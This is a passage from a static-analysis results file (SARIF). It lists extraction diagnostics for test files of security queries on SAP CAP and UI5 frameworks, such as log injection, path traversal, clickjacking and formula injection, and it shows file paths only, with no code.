successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":206}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":207}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":208}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":209}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":210}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":211}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":212}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":213}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":214}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":215}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":216}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":218}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":219}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":220}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":221}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":223}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":225}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":226}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":227}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":228}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":229}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":231}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":233}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/model.cds.json","uriBaseId":"%SRCROOT%","index":235}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure-js-all-sinks/sensitive-exposure-heuristic-source.js","uriBaseId":"%SRCROOT%","index":236}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":239}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":240}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":241}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":242}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":243}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.js","uriBaseId":"%SRCROOT%","index":244}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/BindingStringParser/test.js","uriBaseId":"%SRCROOT%","index":245}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.html","uriBaseId":"%SRCROOT%","index":246}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.json","uriBaseId":"%SRCROOT%","index":247}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.xml","uriBaseId":"%SRCROOT%","index":248}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/JsonParser/test.js","uriBaseId":"%SRCROOT%","index":249}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":250}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/binding_path/binding1.xml","uriBaseId":"%SRCROOT%","index":251}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml","uriBaseId":"%SRCROOT%","index":252}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/dynamic_write_to_html_content/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":253}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":254}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":255}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/sink/sink1.xml","uriBaseId":"%SRCROOT%","index":256}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/source/source1.xml","uriBaseId":"%SRCROOT%","index":257}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":258}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":259}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html","uriBaseId":"%SRCROOT%","index":260}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":261}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":262}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html","uriBaseId":"%SRCROOT%","index":263}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":264}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":265}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":266}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":267}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":268}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":270}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":271}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":272}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":273}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":274}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":275}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":276}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":279}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":280}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":281}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":282}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":283}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":284}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":285}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":286}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":287}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":288}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":289}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diag